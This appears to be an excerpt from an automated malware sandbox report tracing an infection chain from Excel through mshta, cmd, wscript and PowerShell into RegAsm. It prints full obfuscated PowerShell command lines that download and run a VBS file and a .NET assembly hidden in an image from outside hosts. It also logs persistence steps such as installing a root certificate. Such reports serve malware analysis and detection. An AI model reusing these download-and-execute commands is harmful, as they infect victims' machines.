                Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CBE1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE898B022D push eax; iretd 7_2_000007FE898B0241
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE898B00BD pushad ; iretd 7_2_000007FE898B00C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE8988022D push eax; iretd 14_2_000007FE89880241
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE8988223D push eax; ret 14_2_000007FE89882271
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE898800BD pushad ; iretd 14_2_000007FE898800C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00457186 push ecx; ret 17_2_00457199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0045E55D push esi; ret 17_2_0045E566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00457AA8 push eax; ret 17_2_00457AC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434EB6 push ecx; ret 17_2_00434EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002806 push ecx; ret 17_2_10002819
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044693D push ecx; ret 21_2_0044694D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044DB70 push eax; ret 21_2_0044DB84
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044DB70 push eax; ret 21_2_0044DBAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00451D54 push eax; ret 21_2_00451D61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044B090 push eax; ret 23_2_0044B0A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044B090 push eax; ret 23_2_0044B0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00451D34 push eax; ret 23_2_00451D41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00444E71 push ecx; ret 23_2_00444E81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00414060 push eax; ret 26_2_00414074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00414060 push eax; ret 26_2_0041409C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00414039 push ecx; ret 26_2_00414049
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004164EB push 0000006Ah; retf 26_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00416553 push 0000006Ah; retf 26_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00416555 push 0000006Ah; retf 26_2_004165C4

                Persistence and Installation Behavior

                barindex
                Installs new ROOT certificates
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00406EEB ShellExecuteW,URLDownloadToFileW,17_2_00406EEB
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AADB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CBE1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
